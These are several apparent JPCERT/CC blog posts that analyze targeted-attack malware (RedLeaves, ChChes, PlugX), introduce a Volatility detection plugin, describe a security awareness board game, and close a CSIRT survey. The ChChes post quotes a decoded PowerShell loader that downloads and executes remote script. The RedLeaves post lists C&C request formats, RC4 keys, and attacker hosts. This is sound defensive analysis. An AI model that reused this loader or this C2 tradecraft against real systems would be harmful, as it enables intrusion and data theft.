These results show that not so many organizations possess a strong authority in decision-making. However, some CSIRTs answered in the interview that they do not necessarily need to have such a powerful authority as to suspend systems in order to function effectively as a CSIRT. What matters to them is how effectively can the CSIRT collaborate with the management level to expedite accurate and rapid business decision.

Incident handling and Escalation

In case of an incident, an escalation process must be clearly defined, documented and officially approved to ensure that the incident is directed towards appropriate departments. The result shows that 74% of the CSIRTs have these processes implemented towards management, 52% implemented towards public relations department, and 50% implemented towards legal department. This indicates that CSIRTs are working closely with the management level in case of an incident, but more effort can be taken towards other related departments as well.

Information Sharing

It is essential for CSIRTs to share information and cooperates with other departments not only within the organization but also with other external partners such as other CSIRTs. Joining the information sharing framework allows the team to obtain and respond to a cyber threat in an effective way that it ultimately helps to protect the organization.

The result shows that all the survey respondents participate in more than one framework for information sharing. Specific frameworks that they join are WAISE (Watch and Warning Analysis Information for Security Experts - operated by JPCERT/CC), CCI (Counter Cyber Intelligence - operated by National Police Agency), working groups of Financials ISAC Japan, J-CSIP (Initiative for Cyber Security Information sharing Partnership of Japan - operated by Information-technology Promotion Agency, Japan) and so on.

When asked about the primary methods of expression used for sharing information, all the respondents selected text format. At the time when this survey was conducted (December 2015), some CSIRTs have already implemented STIX/TAXII, which is a globally recognized standard for incident information sharing. The protocol has been gradually accepted by an increasing number of CSIRTs over the two years after the survey.

Figure 2. Primary method(s) of expression used for sharing information
Figure2_3

Information sharing and collaboration requires investment of time and technical resources, however, it benefits by far than negatives. Some of the respondents have said in the interview that information sharing with other CSIRTs enables them to acquire knowledge and exchange insights, which helps to keep up the motivation of their CSIRT members. The importance of building trust relationships with other CSIRTs was also pointed out by other interviewees. They spoke of participating NCA and other community activities had provided opportunities to reframe how they interact with their organizations.

Conclusion

The report points to six items that should be defined at the time of establishing an internal CSIRT. However, it does not necessarily mean that fulfilling all these conditions will ensure its activities live up to the expectations of the organization. For the sake of an internal CSIRT to function effectively, it is extremely important that the team shares information and cooperates with other departments within the organization and other CSIRTs. In addition, through day-to-day operations including exercises and training, as well as responding to actual incidents, we believe that newly established CSIRTs develop into a trusted and indispensable part of the organization.

The full report can be downloaded here:

https://www.jpcert.or.jp/english/pub/sr/2015_CSIRT-survey.html

- Misaki Kimura

May 02, 2017

Volatility Plugin for Detecting RedLeaves Malware

Our previous blog entry introduced details of RedLeaves, a type of malware used for targeted attacks. Since then, we’ve seen reports including those from US-CERT that Management Service Providers (MSPs) have been targeted [1] [2]. In the US-CERT report, some instances have been identified where RedLeaves malware has only been found within memory with no on-disk evidence because of the behavior of self-elimination after the infection.

To verify the infection without on-disk evidence, investigation needs to be conducted through memory dump or logs (e.g. proxy logs) stored in network devices.

This article introduces a tool to detect RedLeaves in the memory.

It is available on GitHub:

JPCERTCC/aa-tools · GitHub

https://github.com/JPCERTCC/aa-tools/blob/master/redleavesscan.py

Tool Details

The tool works as a plugin for The Volatility Framework (hereafter “Volatility”), a memory forensic tool. redleavesscan.py has the following functions:

  • redleavesscan: Detect RedLeaves in memory images
  • redleavesconfig: Detect RedLeaves in memory images and extract malware configuration

To run the tool, save redleavesscan.py in ”contrib/plugins/malware” folder within Volatility, and execute the following command:


$python vol.py [redleavesscan|redleavesconfig] –f <memory.image> ––profile=<profile>

Figure 1 shows an example output of redleavesscan. You can see the detected process name (Name), Process ID (PID) and the name of detected malware (Malware Name).

Figure 1: Output of redleavesscan
Fig1

Figure 2 shows an example output of redleavesconfig. For details about RedLeaves configuration, please see our previous blog entry.

Figure 2: Output of redleavesconfig
Fig2

In closing

It has been confirmed that the attacker group who uses RedLeaves also uses PlugX. To detect PlugX in memory, please use the Volatility plugin released by Airbus [3].

- Shusei Tomonaga

(Translated by Yukako Uchida)


Reference:

[1] US-CERT: Intrusions Affecting Multiple Victims Across Multiple Sectors

https://www.us-cert.gov/sites/default/files/publications/IR-ALERT-MED-17-093-01C-Intrusions_Affecting_Multiple_Victims_Across_Multiple_Sectors.pdf

[2] PwC: Operation Cloud Hopper

https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html

[3] Volatility plugin for PlugX

https://bitbucket.org/cybertools/volatility_plugins/wiki/Home

Apr 03, 2017

RedLeaves - Malware Based on Open Source RAT

Hi again, this is Shusei Tomonaga from the Analysis Center.

Since around October 2016, JPCERT/CC has been confirming information leakage and other damages caused by malware ‘RedLeaves’. It is a new type of malware which has been observed since 2016 in attachments to targeted emails.

This entry introduces details of RedLeaves and results of our analysis including its relation to PlugX, and a tool which is used as the base of this malware.

How RedLeaves runs

To have the RedLeaves injected into the process of Internet Explorer, the following steps will be taken (Figure1):

Figure 1: Flow of events until RedLeaves runs
Fig1eng

Malware samples that JPCERT/CC has analysed create the following three files in %TEMP% folder and execute a legitimate application when executed.

  • A legitimate application (EXE file): a signed, executable file which reads a DLL file located in the same folder
  • A Loader (DLL file): a malicious DLL file which is loaded by the legitimate application
  • Encoded RedLeaves (DATA file): Encoded data which is read by the loader

When the legitimate application is executed, it loads the loader located in the same folder through DLL Hijacking (DLL preloading).

The loader, which is loaded in the legitimate application, reads and decodes the encoded RedLeaves and then executes it. The executed RedLeaves launches a process (Internet Explorer) depending on its configuration, and injects itself there. Then, RedLeaves starts running in the injected process. The following section explains the behaviour of the injected RedLeaves.

Behaviour of RedLeaves

RedLeaves communicates to specific sites by HTTP or its custom protocol and executes commands that are received. Figure 2 is the PE header of the injected RedLeaves. Strings such as “MZ” and “PE” are replaced with “0xFF 0xFF”.

Figure 2: Injected RedLeaves
Fig2

The injected RedLeaves connects to command and control (C&C) servers by HTTP POST request or its custom protocol. Destination hosts and communication methods are specified in its configuration. Please refer to Appendix A for more information.

Below is an example of the HTTP POST request. Table B-1 and B-2 in Appendix B describe the format of the data sent.

POST /YJCk8Di/index.php
Connection: Keep-Alive
Accept: */*
Content-Length: 140
Host: 67.205.132.17:443

[Data]

The data is encrypted with RC4 (the key is stored in its configuration) and contains the following:

__msgid=23.__serial=0.clientid=A58D72524B51AA4DBBB70431BD3DBBE9

The data received from the C&C servers contain commands. Depending on the received commands, RedLeaves executes the following functions (Please see Table B-3 in Appendix B for the details of received data):

  • Operation on files
  • Execute arbitrary shell commands
  • Configure communication methods
  • Send drive information
  • Send system information
  • Upload/download files
  • Screen capture
  • Execute proxy function

Base of RedLeaves’s Code

JPCERT/CC analysed RedLeaves and confirmed that its code has a lot in common with the source code of Trochilus[1], a type of RAT (Remote Administration Tool), which is available on Github. Figure 3 shows part of the code to process received data. It is clear that it processes the same data as listed in Table B-3 in Appendix B.

Figure 3: Part of Trochilus’s source code
Fig3_2

It is presumed that RedLeaves is built on top of Trochilus’s source code, rather than from scratch.

Relation to PlugX

Comparing RedLeaves samples that JPCERT/CC has observed with PlugX, used by certain attacker groups in the past, we identified that similar code is used in some processes. Below are the sequence of instructions observed when the sample creates three files (a legitimate application, a loader and encoded RedLeaves or PlugX).

Figure 4: Comparison of file creation process
Fig4

Furthermore, the process in which the loader decodes the encoded data (encoded RedLeaves or PlugX) is similar.

Figure 5: Comparison of file decode process
Fig5

JPCERT/CC has also confirmed that some of the RedLeaves and PlugX samples that share the above code also communicate with common hosts. From this observation, it is presumed that the attacker group using RedLeaves may have used PlugX before.

Summary

RedLeaves is a new type of malware being observed since 2016 in attachments to targeted emails. Attacks using this malware may continue.

The hash values of the samples introduced here are listed in Appendix C. Some of the RedLeaves’ destination hosts that JPCERT/CC has confirmed are also listed in Appendix D. Please check your devices for any suspicious communication with such hosts.

- Shusei Tomonaga

(Translated by Yukako Uchida)


Reference

[1] Trochilus: A fast&free windows remote administration Tool

https://github.com/5loyd/trochilus

Appendix A: Configuration information
Table A: List of Configuration Information
OffsetDescriptionRemarks
0x000 Destination 1
0x040 Destination 2
0x080 Destination 3
0x0C0 Port number
0x1D0 Communication mode 1=TCP, 2=HTTP, 3=HTTPS, 4=TCP and HTTP
0x1E4 ID
0x500 Mutex
0x726 Injection Process
0x82A RC4 key Used for encrypting communication

RC4 key examples:

  • Lucky123
  • problems
  • 20161213
  • john1234
  • minasawa
Appendix B: Communicated data
Table B-1: Format of data sent through HTTP POST request
OffsetLengthContents
0x00 4 Length of data encrypted with RC4 (XOR encoded with the first 4 bytes of the RC4 key)
0x04 4 Server id (XOR encoded with the first 4 bytes of the RC4 key)
0x08 4 Fixed value
0x0C - Data encrypted with RC4

Table B-2: Format of data sent through its custom protocol
OffsetLengthContents
0x00 4 Random numerical value
0x04 4 Fixed value
0x08 4 Length
0x0C 4 Length of data encrypted with RC4 (XOR encoded with the first 4 bytes of the RC4 key)
0x10 4 Server id (XOR encoded with the first 4 bytes of the RC4 key)
0x14 4 Fixed value
0x18 - Data encrypted with RC4

Table B-3: Contents in received data
StringTypeContents
__msgid Numeric Command
__serial Numeric
__upt true, etc. Whether the command is executed by a thread
__data data Command parameter, etc.
Appendix C: SHA-256 hash value of the samples

RedLeaves

  • 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481

PlugX

  • fcccc611730474775ff1cfd4c60481deef586f01191348b07d7a143d174a07b0
Appendix D: Communication destination host
  • mailowl.jkub.com
  • windowsupdates.itemdb.com
  • microsoftstores.itemdb.com
  • 67.205.132.17
  • 144.168.45.116

Mar 28, 2017

Board game on Cyber Security for Awareness Raising

Hi this is Sho Aoki from Watch and Warning Group.

Have you ever tried “game-based learning”?

Learning through games is useful since it is not only fun and easy, but also provides opportunities for thinking. It has been applied widely for educational purposes. In the area of cyber security as well, there are board games released from security vendors, and they have been conducted at schools and companies.

Today I would like to introduce “SEC WEREWOLF”.

Board game package
Secwerewolf

This board game was released by Japan Network Security Association (JNSA) [1], which is an NPO consisting of information security related organizations (mainly vendors) in Japan. They aim to raise awareness and provide information security solutions through various activities. One of their Working Group activities is to promote game-based learning, where this board game was developed. JPCERT/CC is also part of this Working Group.

“SEC WEREWOLF” is a board game based on a famous party game “Werewolf” (also known as “Mafia”), which is a communication type game between a group of “villagers” and “werewolves” who attack villagers. Players probe other players in an attempt to find enemies to eliminate. In “SEC WEREWOLF”, “villagers” work as “CSIRT members” in an organisation, while “werewolves” are the evils in the organisation who are engaged in corruption.

STORY

“Corrupt workers” have been stealing confidential information of their organisation with the assistance from “Black hat hackers” and gaining profit out of the information. However, the management finds out about the malicious act. “Corrupt workers”, who have been dissatisfied about the company’s treatment, try to put the blame on other employees and get them fired. A CSIRT is launched to retrieve a peaceful workplace and deal with issues with an aim to get rid of the corrupt workers.

HOW TO PLAY (Overview)

  1. Players pick up a role card to decide which team they belong to (CSIRT or attackers)
  2. All the players have a conversation without disclosing their roles to figure out who are the “corrupt workers”. “Corrupt workers” will also pretend to be a CSIRT member.
  3. Out of the conversation, each player points out the person who they think is the “corrupt worker” at the end of the turn. The person who has the higher number of votes is dismissed from the game. “Corrupt workers” secretly put the blame to a CSIRT member to get them out of the game.

Process 2 and 3 will be repeated until either of the following conditions is met:

a) All the “corrupt workers” are dismissed (CSIRT wins)

b) The number of remaining “corrupt workers” becomes the same as CSIRT members (“Corrupt workers” win)

Among the board games on cyber security, “SEC WEREWOLF” is relatively easy and suitable for beginners since there is not much prerequisite. This game presents the concept of cyber security and roles within CSIRTs (some role cards have different technical skills). Furthermore, it comes with post-game materials to learn about internal fraud by looking back on how a “corrupt worker” would behave and what CSIRT members needed to do about it. It is also a good material to learn what kind of personnel a CSIRT would need to have.

A model of internal fraud “the Fraud Triangle”, was proposed by D.R. Cressey, a criminologist from the US. It suggests that internal fraud can occur when the following three factors are present: Perceived unshareable financial need, Perceived opportunity and Rationalisation [2].

The post-game material provides a review of the game from the above three perspectives. Also, by looking back at the conversation that occurred during the game, the facilitator can guide participants to further discuss lessons learned from the game. Consequently, they can consider what sort of environment they need to establish/maintain to keep their workplace from such fraud.

Facilitator explaining about internal fraud based on the triangle
Facilitator

The Working Group designed this game for people who are not familiar with cyber security. It is often said that cyber security operations are difficult to draw attention from employees unless they are actually involved. Given the current situation where cyber security is a hot topic not only for organisations but also for individuals, it is important to raise security awareness to wide range of employees and users. This board game provides a good opportunity to familiarise the players with the concept of cyber security and the role of CSIRTs.

Role cards
Role_cards
Trial at JPCERT/CC
Trial

To fully utilise this game, it is also important to develop game facilitators. This role is important in presenting the knowhow in cyber security, how CSIRTs work and the components of CSIRT employees, besides just leading the game.

There is another board game about initial response to cyber incidents, which the Working Group is planning to release in the coming Fiscal Year. JPCERT/CC is willing to assist awareness raising activities through the Working Group.

- Sho Aoki

Translated by Yukako Uchida


Reference:

[1] About JNSA

http://www.jnsa.org/en/aboutus/index.html

[2] The Fraud Triangle – The Association of Certified Fraud Examiners

http://www.acfe.com/fraud-triangle.aspx

Mar 01, 2017

Malware Leveraging PowerSploit

Hi again, this is Shusei Tomonaga from the Analysis Center.

In this article, I’d like to share some of our findings about ChChes (which we introduced in a previous article) that it leverages PowerSploit [1] – an open source tool – for infection.

Flow of ChChes Infection

The samples that JPCERT/CC confirmed this time infect machines by leveraging shortcut files. The flow of events from a victim opening the shortcut file until a machine is infected is illustrated in Figure 1.

Figure 1: Flow of events from opening a shortcut file to ChChes infection
Fig1

When the shortcut file is opened, a file containing PowerShell script is downloaded from an external server and then executed. Next, ChChes code (version 1.6.4) contained in the PowerShell script is injected into powershell.exe and executed. The detailed behaviour in each phase is described below.

Behaviour after the shortcut file is opened

When the shortcut file is opened, the following PowerShell script contained in the file is executed.

powershell.exe -nop -w hidden -exec bypass  -enc JAAyAD0AJwAtAG4Abw ~omitted~

The PowerShell script after “-enc” is encoded. Below is the decoded script:

$2='-nop -w hidden -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString(''https://goo.gl/cpT1NW'')"';if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $3 $2";}else{iex "& powershell $2";}

By executing the above PowerShell script, a file containing PowerShell script is downloaded from a specified URL. The downloaded script is loaded in 32-bit powershell.exe (syswow64\WindowsPowerShell\v1.0\powershell) and executed. The reason why it is executed in 32-bit is considered to be that ChChes’s assembly code contained in the PowerShell script is not compatible with 64-bit environment.

 

Details of the Downloaded PowerShell Script

The downloaded PowerShell script is partially copied from PowerSploit (Invoke-Shellcode.ps1). PowerSploit is a tool to execute files and commands on a remote host and is used for penetration tests.

When the downloaded PowerShell script is executed, it creates document files based on data contained in the script, store the files in the %TEMP% folder and displays them.  We’ve seen different types of documents shown, including Excel and World documents.

 

Next, ChChes code contained in the PowerShell is injected into powershell.exe. The injected ChChes receives commands and modules from C2 servers as explained in the previous blog post. The PowerShell script and the injected ChChes are not saved as files in the infected machines, and ChChes itself only exists in the memory.

Figure 2 is a part of the PowerShell script.

Figure 2: Downloaded PowerShell script
Fig2

Confirming Attack Traces through Event Logs

In environments where PowerShell v5.0 is installed (including Windows 10), the PowerShell script downloaded from remote servers are recorded in the event logs under the default settings (as Figure 3). When you investigate, please check if your logs contain such records.

Figure 3: Contents recorded in Event Logs
Fig3

Such logs can also be obtained in PowerShell v4.0 (Default version of Windows 8.1) by enabling the following Group Policy.

  • Computer Configuration -> Administrative Templates -> Windows Components -> Windows PowerShell -> Turn on PowerShell Script Block Logging

Summary

It is now quite common that PowerShell script is leveraged for attacks. If your event log configuration is not set to record PowerShell execution, it is recommended that you revise the settings in preparation for such attacks. Also, if you are not using PowerShell, it is suggested to restrict the execution by using AppLocker, etc.

-Shusei Tomonaga

(Translated by Yukako Uchida)


References:

[1] PowerSploit

https://github.com/PowerShellMafia/PowerSploit

Appendix A: SHA-256 Hash Values of the samples

PowerShell

  • 4ff6a97d06e2e843755be8697f3324be36e1ebeb280bb45724962ce4b6710297
  • 75ef6ea0265d2629c920a6a1c0d1dd91d3c0eda86445c7d67ebb9b30e35a2a9f
  • ae0dd5df608f581bbc075a88c48eedeb7ac566ff750e0a1baa7718379941db86
  • 646f837a9a5efbbdde474411bb48977bff37abfefaa4d04f9fb2a05a23c6d543
  • 3d5e3648653d74e2274bb531d1724a03c2c9941fdf14b8881143f0e34fe50f03
  • 9fbd69da93fbe0e8f57df3161db0b932d01b6593da86222fabef2be31899156d
  • 723983883fc336cb575875e4e3ff0f19bcf05a2250a44fb7c2395e564ad35d48
  • f45b183ef9404166173185b75f2f49f26b2e44b8b81c7caf6b1fc430f373b50b
  • 471b7edbd3b344d3e9f18fe61535de6077ea9fd8aa694221529a2ff86b06e856
  • aef976b95a8d0f0fdcfe1db73d5e0ace2c748627c1da645be711d15797c5df38
  • dbefa21d3391683d7cc29487e9cd065be188da228180ab501c34f0e3ec2d7dfc

Feb 21, 2017

PlugX + Poison Ivy = PlugIvy? - PlugX Integrating Poison Ivy’s Code -

Hi again, this is Shusei Tomonaga from the Analysis Center.

PlugX is a type of malware used for targeted attacks. We have introduced its new features in the blog article “Analysis of a Recent PlugX Variant - ‘P2P PlugX”. This article will discuss the following two structural changes observed in PlugX since April 2016:

  • the way API is called
  • the format of main module changed from PE to raw binary code

In this article, we will refer to PlugX observed after April 2016 as “New PlugX”, and older versions as “Old PlugX”.

Change in API call

When calling Windows API, Old PlugX used the API names as the key to load the corresponding library functions based on their addresses, which is a similar behaviour of calling APIs from the usual PE files. Therefore, Old PlugX code contains strings of the Windows API names.

In contrast, New PlugX does not contain any API name strings in its code, but instead possesses hash values of those API names. When calling an API, it obtains a list of APIs by using Windows functions and performs hash calculation one by one. The API name whose hash value matches the specified value is set as a key to call an API. This method is used when code without IAT (Import Address Table), meaning code other than PE format, call Windows APIs and is applied within shellcodes. This method is also used by some types of malware in order to conceal API names.

Code in Figure 1 shows how New PlugX is calling the Windows API ‘GetSystemInfo’. “86AA8709h” is the hash value for ‘GetSystemInfo’. Address resolution is performed using the hash value, and it jumps to GetSystemInfo’s address by “jmp eax”.

Figure 1: The function calling for GetSystemInfo
Fig1_plugx_call

In principle, as long as a collision doesn’t occur, any hash algorithm can be used for hashing Windows API names. However, New PlugX uses the same hash algorithm as Poison Ivy. Figure 2 compares the hash function of New PlugX and Poison Ivy.

Figure 2: Windows API hash function for New PlugX (left) and Poison Ivy (right) (Parts that match are in light blue)
Fig2_plugx_diff

Change from PE format to raw code format

While Old PlugX stored the malware in PE format (DLL), New PlugX stores only its code and does not contain a header. A single PlugX sample (‘PlugX Data’ in Fig.3) contained both the encoded version of PlugX and code to decode it (‘Decoding code’ in Figure 3). When the sample is executed, the main module of PlugX (‘PlugX main module’ in Figure 3) is decoded, and it injects itself into another process to be executed in that process. The execution flow in Old PlugX is described in Figure 3.

Figure 3: Execution flow in Old PlugX
Fig3_plugx_old

Figure 4 describes the execution flow in New PlugX. Like Old PlugX,  the main module, which is encoded, injects itself to a process and then it is executed in the process. The big difference is that the main module has been changed from PE format (DLL) in Old PlugX to raw code format in New PlugX.

Figure 4: Execution flow in New PlugX
Fig4_plugx_new

Figure 5 shows the beginning of the decoded main module of PlugX. While Old PlugX had a header that is equivalent to one in a PE format, New PlugX begins with executable code and there is no PE header.

Figure 5: Old PlugX (above) and New PlugX (below) after decoding
Fig5_plugx_form

Summary

Upon upgrading Old PlugX to New PlugX, the developer presumably referred to Poison Ivy which is also used for targeted attacks. As previously explained, New PlugX uses the same hash value for API call as Poison Ivy, but on top of that, the raw code format that New PlugX applies is also one of the features of Poison Ivy. The purpose of the upgrade is thought to complicate malware analysis so that malware can be used for a longer period of time.

We should keep an eye on PlugX because it has been evolving and still constantly used to conduct targeted attacks. At this stage, both New and Old PlugX are still being actively used.

We would like to recommend that you revisit our article since the demonstrated features there (configuration information, communication method, encode format etc.) remain the same in New PlugX.

Thanks for reading.

- Shusei Tomonaga

(Translated by Yukako Uchida)